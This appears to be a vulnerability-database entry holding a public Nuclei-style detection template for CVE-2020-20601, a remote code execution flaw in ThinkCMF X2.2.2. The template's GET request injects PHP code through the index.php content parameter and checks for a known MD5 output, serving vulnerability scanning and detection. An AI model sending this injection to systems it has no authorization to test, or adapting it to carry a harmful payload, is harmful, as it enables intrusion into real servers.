漏洞描述
ThinkCMF X2.2.2 and below contain a remote code execution caused by processing crafted packets, letting attackers execute arbitrary code remotely, exploit requires sending malicious packets.
CVE-2020-20601: ThinkCMF X2.2.2 - Remote Code Execution
PoC代码[已公开]
id: CVE-2020-20601
info:
name: ThinkCMF X2.2.2 - Remote Code Execution
author: pikpikcu
severity: critical
description: |
ThinkCMF X2.2.2 and below contain a remote code execution caused by processing crafted packets, letting attackers execute arbitrary code remotely, exploit requires sending malicious packets.
reference:
- https://www.shuzhiduo.com/A/l1dygr36Je/
- https://blog.riskivy.com/thinkcmf-%e6%a1%86%e6%9e%b6%e4%b8%8a%e7%9a%84%e4%bb%bb%e6%84%8f%e5%86%85%e5%ae%b9%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-20601
cwe-id: CWE-94
epss-score: 0.48111
epss-percentile: 0.97591
cpe: cpe:2.3:a:thinkcmf:thinkcmf:x2.2.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thinkcmf
product: thinkcmf
tags: cve,cve2020,thinkcmf,rce,vuln,vkev
http:
- method: GET
path:
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
matchers-condition: and
matchers:
- type: word
words:
- "d9b2c63a497e2f30c4ad9ad083a00691"
- type: status
status:
- 200
# digest: 4a0a0047304502202e5b81202e8926cae6db0cd4c95d45af95577e6124437ff83087484910199b7d022100b6dae222d727407e2c8cc2594f9cd28b913ccbd4605c0851b43ba053068af359:922c64590222798bb761d5b6d8e72950